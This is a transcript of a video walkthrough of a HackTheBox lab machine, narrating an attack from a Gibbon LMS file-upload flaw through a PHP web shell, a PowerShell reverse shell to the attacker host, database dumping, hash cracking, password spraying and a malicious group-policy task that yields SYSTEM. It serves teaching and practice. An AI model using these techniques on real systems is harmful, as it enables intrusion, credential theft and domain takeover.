What's going on YouTube? This is Ipsec. We're doing TheFrizz from HackTheBox, which is a nice medium box that starts out with discovering a website running an outdated version of some software that is vulnerable to a file upload vulnerability, and because it's PHP, it easily leads to remote code execution. On the box, you can dump the database to get another user's password, which lets you access the box as a domain user. And if you examine their recycle bin, you discover a backup that has another credential. This account has access to edit group policies, so we can use SharpGPOAbuse to create a malicious group policy and get root. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it TheFrizz, and then the IP address of 10.10.11.60. This can take some time to run, so I've already ran it. Looking at the results, we see 13 ports open, the first one being SSH on port 22, and the banner tells us it's open SSH for Windows. So it looks like this is a Windows box and we have SSH running. The next thing is DNS on port 53. The banner is simple DNS plus, and whenever I see that, I look down at Kerberos, and yes, it is going to be Active Directory. And we have the domain of frizz.htb, and then somewhere to probably say the host name of the box, we see frizzDC.frizz.htb. And it's annoying that the DNS doesn't match up with the box name. I'm sure I'm going to make this mistake somewhere where I do the frizz instead of frizz. But let's just go ahead and start our host file out. So we'll do 10.10.11.60. And then we'll do, what is it? frizzDC.thefrizz.htb, frizzDC, and frizz.htb. And I already made the mistake. There we go. Thankfully, I caught that, unless I would have been really confused a little later on in this box. So there we go. That is saved. And let's see what else we have. HTTP on port 80, and its banner tells us it's Apache 8 with SSL and PHP. The TTL is 127, so we know this is probably Apache on Windows. If we looked at the HTTP server header, it is telling us it is Win64 as well. It is also redirecting us to frizzDC.frizz.htb. And then all this other stuff is standard, like Active Directory type things. Looking down at the nmap scripts, it looks like we do have a clock skew. So if we do anything with Kerberos, we'll need to run ntp date to sync the time. So I'm just going to run nxc real quick. It's something I just always like doing on Windows boxes just to see what it says, because it may have interesting flags. And the latest version of nxc now tells us if NTLM authentication is enabled, and we see it is disabled here. But nothing new. We see the host name, the domain, and signing, SMBv1. All this stuff is standard. So let's go take a look at the web page. So let's go to, what is it, HTTP, frizzDC.frizz.htb. And we just get a page, the Walkersville Elementary School. And let's see. I'm looking for like a link to click. I'm going to guess this is going to be a PHP site. If we click on home, it's actually home.html or index.html. If we do PHP, it doesn't look like we have PHP yet. So this is going to be static pages. If we click on pricing, HTML, if we go over to staff login, we're doing Gibbon LMS, and this is probably going to be the PHP application. If we look, we also see Gibbon version 25.0.00. So we have a version if we want to start looking at like Searchploit or something like that, right? I also always like looking at the network tab when I load a page, because you'll be surprised how often things just leak the version in these queries, right? It's right here. It's going for jQuery.js, putting version 25.0.0. So we can see the version here. Normally, if you see the version spanning multiple files, so you see this is like jQuery, there's probably going to be another one, tinymce, and they all have the version string, then it's probably going to be the version of the application or something. This is also something just good to search for on like the GitHub project, so you can find out what commit is in this. This common.js, maybe it's requesting version 1.0 of common.js. That one doesn't match 25, but just something to keep in mind, right? So we could try guessing credentials, but since we have the version, I always just like going to like CVEDetails and then looking at the application and seeing what vulnerabilities there are, right? We could also like Google Gibbon LMS, release notes, change logs to find out when this was published. But I'm just going to search it here. And we have a lot of versions here. I could just select the version I have, but I always just like going over to the vulnerabilities tab and looking at all the CVEs, right? So let's just click accept there. I'm going to ignore like lows and mediums at first because I like just like looking at the highs real quick. First one is 26, so we're probably going to be version here, vulnerable here, but it's remote authenticated users. We don't have a credential yet, so I'm going to skip that. We have this CVE. It's going to module school admin messengers settings.php for an SSTI. Because this is settings, I'm going to guess we need authentication here, but if I don't see anything else, I'll probably start doing research here. We also don't see a potential exploit or public exploit, so we may not find exploits quickly for this. Let's see what else we have. We have this one, version 25.01, or 25.00 most likely, and it allows arbitrary file write because this doesn't require authentication. So this is probably going to be the CVE we want just because we have file write and it doesn't require authentication. So let's go take a look at this. Going over to Hero Lab, it looks like it has some details here. This is the vulnerable code. It's checking for the parameter image, the path. I guess we're getting absolute path, and then we write it. Yeah, fopen, write, close. So this is going to be the request. We sent a post request to /modules, rubric, Rubix visualize, and then the parameter down here as the payload, right? And we're uploading a PNG, but we're calling it asdf.php. And this is going to be base 64 of a web shell probably, right? I'm going to copy this. %2b, that is HTML encoded. I want to say HTML encoded. Whatever one is HTML to hex. It may be ND encoded or something like that. I forget the exact name, but this is base 64 and this is going to be a equal sign, right? So I'm just going to copy this and I'll put the equals manually so we can see what this does. So we'll do base 64 W0. And then I just like doing an echo after this to make sure we have a line break. I wanted -d to decode. There we go. So we see PHP echo system get CMD. It doesn't look like it's closing the PHP tag, but I don't think that actually causes an issue. So that's probably going to be fine. We could fix up the web shell if we wanted to. Because we're doing echo on system's going to print to standard out, and then we're going to print that again. So anything we run is going to have a double print. This is a common mistake web shells do make, but everything looks fine here. So let's go ahead and start this request, right? So let's go over to our page, and I'm going to make a request in Burp Suite. So we're going to turn that on, refresh, go over to Burp, send it to the repeater tab. There we go. And then we want to go over to the exploit. I'm going to get this page. First, change the method to a post. We're going to append that /modules to Gibbon LMS. And then we want to add this. Send that. And it just says asdf.php. So I'm guessing this wrote. So I'm going to send another request. And then let's just go to asdf.php, send this request, and we see undefined array key CMD. That's just erroring because we tried to do a system command on the argument CMD and didn't supply it, right? So I'm going to do $CMD is equal to who am I? And now the script should run, and we see we're the w.web service user, and the domain is TheFrizz. So now let's get a reverse shell. I'm going to go over to my box. I'm going to make dir dub. We can go in here, and then I'm going to copy user share nashang. Was it shells invoke? Is it like PowerShell TCP or something? TCP one line.ps1. I'm going to call it shell.ps1, and let's edit this. Delete those comments. And here's this web shell I like using. Let's go ahead and replace this IP with 10.10.14.8, which is our IP address. And then I'm going to put port 9001. We'll save that. And let's just send the shell right away. So I'm going to cat this shell.ps1. I'm going to convert this to UTF-16 little endian because that's the format PowerShell likes it. All that does, if we XXD it, we see every character has a null byte after it. If we remove that conversion, XXD, we see this is how it normally looks, right? So that's all the PowerShell wants, is it being in this UTF-16 little endian format, which is common on Windows. I'm going to do base64 w0 and then copy this payload. And let's send this in. So we'll do PowerShell. And I'm going to do a plus because spaces don't work in URLs. You can either do a plus or %20. I'll use a plus and then -E and C for encoded command. And then we'll paste this payload. And we also want to make sure we're listening. So I'll do rl wrap nc lvmp 9001. All this rl wrap does is allows me to use the up arrow in my reverse shell on Windows host. Makes it really nice. If we send this and get an error. Oh, if we look, there is a plus here. There may be multiple pluses, but this base64 has a bad character. So what we're sending really is PowerShell space encoding space and then 2 strings. We just want it to be 1, so I'm going to highlight this plus, Control U to URL encode it, and then hit it. And this hangs, and we go back here, we have a connection. So if we do a who am I here, we are the FrizzW.web service user. So whenever I land on a web server, I always like going for the database, right? So let's see, I'm just going to search for config, and we find config.php. So let's do a type config.php, and here is the database info. So we see the username is Mr. Gibbons DB, and the password is going to be Mr. Gibbs Parrot 1, right? So we could either upload Chisel to this box and then set a port forward to access MySQL over a tunnel, or since we're in XAMPP, the MySQL is actually going to be locally on the box, so we can just use the MySQL bin. And that's what I'm going to do so we don't have to set up a tunnel, because setting up a tunnel can be somewhat of a pain. First, let's go ahead and copy this because I have a feeling I'm going to need this multiple times. So let's see. I'm going to say MySQL, Mr. Gibbons DB, and then we want to put this password in. There we go. I don't think that quote's there. There we go. So now we just have creds. So what we want to do next is going to be dumping the database. So let's do a dir and make sure we're in the right directory. I don't see mysql.exe. It's probably in bin. And this should be it. We could also just run MySQL dump and dump everything, but I just like using MySQL. So we'll do /mysql.exe and then -u, the username. Let's go ahead and copy this. We'll copy, paste, and then -p. It has special characters, so I'm going to make sure I put it in a single quote. And we can paste this. And then I want to say the database was just Gibbon or Gibbons. Let's go config, type config. Where is it? Gibbon is the database. And we can do -e for a command. And I'm just going to do show tables. We'll run this. And now we have all the tables here. So what we want to do is look for something like user. Do we have it? Username format. No user there. Let's see. Where is it? Maybe Gibbon person. We could start looking at like GitHub to find out exactly how this works, but maybe person's going to be it. So let's do, instead of show tables, describe Gibbon person. And let's see. What do we have? MFA. So this looks like we're probably in the right table. Is there a password, student ID, emergency number, job title, phone? Let's see. Okay, there we go. We have password strong salt, and username. So it looks like passwords may be salted. So let's just start extracting these 3 things. So we can say select username, then what was it? Password strong and password strong salt from Gibbon person. Is that it? It looks like it is. And there's only one user. We have f.frizzle, right? If you didn't know, instead of a semicolon at the end of a query, if you do a \G in MySQL, it'll output it like this with 1.row, 2.row, whatever. And it makes it a little bit easier to see each of these parameters, right? So we can see the password is this. The strong salt is that. What I want to do is echo-n, wc-c, 64. Is 64 going to be a SHA-256 sum? Let's see, echo SHA-256 sum. Let's do awk print 1, wc-c. If I type correctly, yeah. It says 65, but there's a line break here. So this is probably going to be a SHA-256 sum, and it's salted. So we can't just crack this right away. We have to figure out how it's using the salt. It's probably either going to be prepended or appended, right? We could just try both formats. I always like being scientific and seeing exactly how. So I'm going to search GitHub and then Gibbon LMS. I'm going to take Burp Suite off real quick. And let's find the GitHub page. Probably this core. And it is going a little bit slow. There we go. Let's see. I'm not logged into GitHub, so I can't just search, right? If I search for hash or something, pull request, no code. So I'm just going to git clone. If you're logged into GitHub, the search works so much better. But we can just do a git clone, and this will let us do the greps we need. So I'm going to pause the video, let this clone finish, and then we'll resume. Okay, we have Gibbon cloned. So I'm just going to go cd core, and then I'm going to grep-r for recursive. And then we could either search for like password strong salt. I'm just going to search for hash. And let's see what we have. Right at the top, the preference password process, password strong. We're doing a hash, a SHA-256, and doing salt, and then the password. So we're prepending the salt. So let's go ahead and go into the Kraken. So let's do sh Kraken. And this is going to be just where I have hashcat installed. So hashcat v hashes. I'm going to call this gibbon.sha256. And let's do this again. I want to say we do the hash colon the salt, and that is the right format. We also have the username, so I'm going to add that to this as well. f.frizzle. That looks fine. So let's do /hashcat hashes opt word list rocku.text, and we'll give it the username flag. And this is going to error first. I'm hoping it will tell me the hash modes that it thinks it can be, and then I can pick one I want, right? So we got SHA-256 and then password and the salt appended, and here's the salt prepended. So we want mode 1420. It's also got a salt, password, salt, which is kind of funny. There's a lot of ways it can do that. But I'm just going to specify dash mode 1420. And now we should start cracking this password, right? So it is initializing the backend runtime. And there it goes. And it looks like we have cracked it, recovered 1 out of 1. So let's just remove this word list, and we can do a -- show. And we see the password for f.frizzle is going to be Jenny Loves Magic 23. So let's copy this, and then we can add this to our creds.txt. There we go. Was in the wrong directory. And then f.frizzle and paste Jenny Loves Magic. There we go. Let's do nxc smb 10.10.11.60 - f.frizzle -p, put in this password. And let's see, status not supported. Is it like -k for Kerberos? Let's see. Clock skew. So let's fix that. We'll do sudo ntp date 10.10.11.60. This will set our clock to be the correct thing. And now hopefully we get a success. Maybe we have to use the fully qualified name here. So I'll do frizzDC.frizzHTB. I think that's it. I almost typed TheFrizz.htb, but it looks like it works here. So why didn't this work? It's mainly just because Kerberos really likes host names and stuff like that. So it kind of failed there silently. So when we added the host name, it worked, right? We also probably should generate the KRB5 file. So I'm going to do a -- generate KRB5 file. I'll call it frizz.krb5. This way, just we can configure our Linux host to talk to Active Directory better, right? So I'm going to do a sudo cp this file over top of etc krb5.conf. And there we go. So whenever I get a user on a Windows domain, I always like just going to Bloodhound. So let's do RustHound, Community Edition, domain, frizz.htb, user f.frizzle, and the password of this. And it's going to collect everything. And then let's go ahead and start Bloodhound. So let's do cd opt bloodhound server docker compose up-d. And it looks like it's running. So now let's do localhost 8088 because that's where I have Bloodhound configured to run. And we can log in. And then we're just going to upload all the files. So let's go over to administration, upload files, and then let's go to HTB, TheFrizz, highlight these JSON, and click upload. So I'm going to wait for this to finish, and then once it's in, we'll go poke at the data here. Okay, we have Bloodhound imported, so let's go over to Explore, and then we're going to search for the user we have is f.frizzle, and let's mark this user as owned. And then looking down at outbound control, we don't have anything. We can also set, what is it, w.webservice is what our web shell was off of. So let's see if this user is any different. Add to owned. And let's see, nothing. So we could do a cipher query and then do like shortest path from owned principals. So let's do owned objects. Yeah, let's just do this. See if we have anything. Web service, member of domain users, which doesn't look like anything. We also have f.frizzle, which is remote management user. So that would be a good starting point. We can probably just SSH into the box as we're a member of this group. Let's see. We can do shortest path to tier 0 and see what this looks like. And it's a little bit of a mess. It looks like v.frizzle has right owner over administrators. So this could be a potential path. Of course, administrator. But I don't see that much on Bloodhound. This data just is nice to have. So let's go ahead and SSH into the box and see what we have. And before I do this, I do want to highlight something. And this is going to be a really odd issue. Let's just get the TGT first. So we'll do get TGT. What is it? We got to do frizz.htb, f.frizzle, and then the password like this. And this should get us the TGT. And now I'm going to do something in my host file, and it's going to break my ability to SSH. It's very picky. It's a weird like edge case. But if we put anything before the fully qualified name, so I'm just going to put the domain first like this. I'm going to save this. And this isn't going to let me to SSH in, which is a little bit odd. So we'll do krb5cc name is equal to, what is it, f.frizzle. And we can do sh-K for Kerberos, f.frizzle at frizzDC.frizz.htb. So if we do this, I'm expecting this to fail. Permission denied with that. If I do a -v for verbose, we can see eventually it comes down and says server not found in Kerberos database. And this is because it's doing like a reverse DNS lookup eventually, or maybe it's just doing a DNS lookup, right? And whenever it looks at 10.10.11.60, it's returning frizz.htb that isn't matching the host name of the box. I believe that's why this error is happening, right? So again, we're going to run that. We see server not found in Kerberos database. I'm just going to swap these lines. So now we have the fully qualified name being first. And when my host resolves 10.10.11.60, it becomes that. And suddenly it matches and we get into the box. So if you're trying to SSH with Kerberos and having issues, it's probably going to be your host file just has it incorrect, right? We could also try, I'm pretty sure if we do, let's try, what is it? Just the host name. So we'll do frizz DC like this. And I think this will fail as well. Let's exit, SSH, and oh, it looks like that worked. It just doesn't like the domain being first. But yeah, so that is going to be the issue. I'm actually surprised this one worked. Maybe I forgot to save it. Before I do that, cat etc host, if I can type, I did forget to save it. I know myself all too well sometimes. Try this. It still works. So yeah, you just want the host name first. I guess I'm superstitious and always put the fully qualified name, but looks like the host name works as well. So if you run into issues, it's probably something like that. So now let's go ahead and take a look at this box, right? We can do a tree./f, and this is going to show me all the files. We have user.txt, nothing too interesting here. I bet if we went in like app data, we could search for more files, but there's nothing in the home directory. And this one is a little bit hard to find. Even if I ran like WinPs, by default, it wouldn't find this. It doesn't look in the recycle bin. So if I just do a GCI-force, this is going to show me hidden files. We see the recycle bin. Let's go in here. So we'll do a CD, put it in single quotes like this. The $ makes things tricky to enter on a command line. Do a GCI-force again, and we see this. This is the SID, and I think 1103 is the SID of our user. We can quickly look at that by just going here. Let's do f.frizzle, and Bloodhound should tell us the SID, right? 1103. Yep. I'm only looking at the last one because this is going to be the domain SID, so that's the same for all users. This is the user ID, and that matches, right? So if we go into this, so CD here, I'll do GCI force again, we can see 2 files are deleted. There are 3, but this, when it begins with I, this is going to be the metadata of this file, right? I guess Windows does this, so if you delete the same file name twice, it doesn't collide with each other in the recycle bin. I want to say these are just like randomly generated. This E2xmeg, that's the ID. This is metadata. This is the file itself. If we do, what is it? I think format hex is like XXD in Windows. Let's see. Enter this file. Yep. So we can see this is going to be the information. It was in C:users f.frizzle app data local temp, and then wapt-backup sunday.7zip. So that's going to be the file. Let's do a dir, and I'm going to try to download this file. And I've had trouble in the past using SCP to download this file. I'm not sure exactly why, but we'll go see if it happens. Either way, I'll show the other way I can do it. There's a lot of ways you can copy a file, but I'll show the way I would go. So we can put this, what was it? f.frizzle at frizzDC.frizzHTB. And then let's do, I think I need to do forward slashes, not backslashes. So we'll go like this. Copy this, and we want re2xmeg.7zip, and I'm going to say this is what, wapt.7z, I guess. No such file. Let's see, do we have to escape this? It's always a little bit tricky specifying these paths. Let's try C:. That didn't work. f.frizzle. Oh, I think I said SCP, but did not type it. That definitely helps. There we go. It's copying the file. So it's going to take a second. We can do git file hash while that goes. re2.xmeg7zip. Algorithm MD5. So this is going to be the MD5 sum of the file. And then when this copy is done, I'm going to look at the MD5 sum of what we get. do ls, md5 sum, wrapped, we get a different hash. If we try to extract this, so we'll do 7zx wapt, unexpected end of archive. So for some reason, it's not copying, and I've done a lot of just playing around. I can't figure out exactly why this fails. If we do like format hex on this, this was going to be R, what was it? Select object first 10. Sweet. We do XXD, and where is it? WAPT. Let's do head 10. The hex looks the same, like D01, E3. All this is matching up if I eyeball it, right? A401, A401. If we did a reverse, so if we do select last 10, this is going to be where it gets really different. Let's do tail like this. Let's see. It ends in 9E00. It ends like this, 7499. There is no 99 here. So somewhere like the encoding gets all wonky and it's just not working, right? So let's go ahead and do a dir c:\examp access denied. So what I'm going to do is we'll copy re2 xmeg7zip to program data wap.7z. I forgot the $sign. There we go. And then I go back to my web shell because this is where I'm running as the web user, right? So this is probably going to be like, what is it? Apache, HTDocs, there it is. Home. So this is going to be where the web server is. So now I can just do a copy program data wap.7z here. And now we have put a file in the web directory. So I can now just do a wget frizz hdb home wap.7zip. And it's copying it. We have no clobber by default, so it's not copying over top of it. That's why we have the .1. But once this copies, we'll do an MD5 sum on this, right? MD5 sum, wrapped, and 4192, that is what we're expecting, right? If I do 4192, that is the file hash. So copying it from the web worked much better than SCP. Not sure why. I want to say OXDF, he had no issues with SCP. I don't know why I am, but I figured I would show you. So let's do 7zip to extract this. And it looks like it's extracting to the directory wrapped and unsupported method for 2 files. Doesn't look like that's important. So let's go in here and let's see. If we go into conf, we have a configuration file. So we can cat conf wap.ini, and looking at this, allow unintended registration, a password. And this looks like base64 to me, right? So let's go ahead and copy that. I'm just going to do a new pane real quick. Echo base64-d. And that does go to something, right? So let's now spray this. We could use netexec to spray. I'm trying to think. I guess there's no harm. So let's go ahead and build a user list. So I'm going to cat my bloodhound file of users.json. And we'll use JQ. And we're going to go in data. That's a list, properties, and then I think SAM account name. Yes, so that's what we want. So let's do JQ.data. It's a list, so open close bracket, properties, SAM account name, like this. And we can do -r to get rid of those quotes. And then we have users. Awesome. Let's do that password here. So we can grab this. And then let's see, NXC, we'll do, I guess we can do SMB, frizzDC.frizz.htb, username, users.text, password, this, and then continue on success. That looks good. And let's see if we get any hits, right? What I was saying, we need -K for Kerberos. Let's see. Make sure that looks fine, I think. What I was saying is if we just did a dir/users, we see there's only a few interactive. So the password could be administrator, m.schoolbus, or v.frizzle. We already have m.schoolbus and w web service, so we don't really need that password. But here we see we're getting access to m.schoolbus. So let's go back over to Bloodhound and we can say m.school. Hold on. This is going slow. Delete that. m.schoolbus. There we go. Right click to add to owned. And then let's look. So outbound object control 16. So we're a much better spot here. We can own all of these users. We're also a member of desktop admin. That's a member of group policy creator owners, which looks like we can create group policy objects. So let's go ahead and see if we can switch to this user. The first thing I'm going to do, click here. Member of, are we remote access, remote management? Yes, we are. So we can just use SSH again. Awesome. If I wasn't remote management, we may have to do like run as C#, upload it, and switch users that way. But it looks like we should just be able to SSH right in. So let's do a get TGT again. TheFrizz HTB m.schoolbus. Put in this password. I'm going to put it in quotes because we have some special characters. There we go. Then Kerberos5cc name. Specify m.schoolbus. SH capital K for Kerberos. m.schoolbus at TheFrizz HTB. And come on. Looks like we are going to get in. While this goes, I'm going to go cd dub. And then we're going to copy our opt sharp collection net framework for, we can probably do 4.7 now. Any. And I want to do a sharp GPOAbuse. There we go. I'm going to copy this here. If you don't have this directory, you can just search like GitHub sharp collection. It's really nice. It has a lot of just .NET binaries for you to run, so you don't have to go ahead and try to find or compile them yourself, right? So we can do Python 3, HTTP server, and let's go program data. And I'll do a curl HTTP 10.10.14.8 8000 SharpGPOAbuse.exe SharpGPOAbuse.exe. Sweet, I got all the casing right, I think. And we have the binary here. So what this is going to do is allow us to create a malicious group policy object and then target it against the domain controller and run it, right? We could also, we did whoami/all. I think this will show what groups are if we didn't want to run Bloodhound. Let's see, group information, desktop admin, group policy creator owners. So there's other ways we could find if we didn't want to run Bloodhound. But now that we have SharpGPO, I just want to execute it real quick. What was the name of it? GPOAbuse. Yep, SharpGPOAbuse.exe. Make sure it runs. Looks like it does. So we could run it against one of these group policy objects. I don't have it up anymore, but there were two GPOs that it showed. I don't like doing that because it could modify a GPO and create an issue. So I'm going to see if I can create my own GPO first. Because this way, if it screws things up, it's easier to delete. We're not modifying what already exists. Never try to like use SharpGPOAbuse on the default domain controller policy or default domain policy because really bad things will happen if you screw up those group policy objects, right? So let's just do new GPO -name ipsec. And this will create us a GPO. Hopefully, if this PowerShell snapping is there. Looks like it is. So we have the new GPO there. And we want to link this to the organizational unit or OU that the domain controller is in. So I'm going to do new, not new GPO, new GP link. The GPO is IPsec, and then the target. You could just do like DC equals frizz, DC equals HTTP and go everywhere. But the issue with that is if you do it on a large domain, you're going to target all the computers in that domain. And whenever they refresh group policy, it's just going to cause all sorts of chaos, right? So I always like targeting as specific as possible when I use this tool. So I'm going to go back in here. We can say frizz DC, see exactly where this guy is located. So click there. You can't use a CN when targeting. You can only use organizational unit. So I'm going to target the domain controllers OU. So if they had like 100 domain controllers, it would execute on all 100 of them, but that's much better than executing on all the clients and everything like that, right? So let's just specify that. And this should link our GPO there. Okay. And now what we want to do is the SharpGPOAbuse. So we can do that. And then we want to add a computer task. The GPO name is going to be IPsec. We have to give it the author of IPsec. And then we got to give the task name. We'll do rev shell. Command is going to be PowerShell.exe. And then the arguments is going to be -enc for encoded command. And then we want to go back and get our shell. Let's see. cd dub. Do we have this still? We called it shell.ps1. Like this. Awesome. Copy this. Go back here. RL wrap nc lvnp 9001. Paste this reverse shell in. Unknown argument error. Arguments. SharpGPOAbuse. Let's see. I wonder if it's case sensitive. Arguments like that. Unknown argument error. Add computer task. Like that. Author, task name, unknown argument error. Put everything in quotes. This is bizarre. Do I have a typo somewhere? Add computer task. Matches. GPO name. Let's see. Did the GPO like get deleted? Target. That is bizarre. Let's see. Oh, 2 dashes there. I think that's it. That is not it. Let's see. Does it not like how we have arguments? Because we have a dash here. Like if we did this in a single quote. Unknown argument error. Does it not like, it's definitely not the space now. Okay. I think it was treating this dash as an argument because it started a thing. So I have PowerShell executing PowerShell. It looks like that worked. Bizarre, but okay. Let's do GP update /force, updating policy, and hopefully we get a shell in, let's say, 10 seconds. Computer policy, there we go. And looking at this, who am I /all, we're going to be the system user, right? Just do who am I, enter your authority system. So we can go users, administrator, desktop, and get the flag this way. So that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.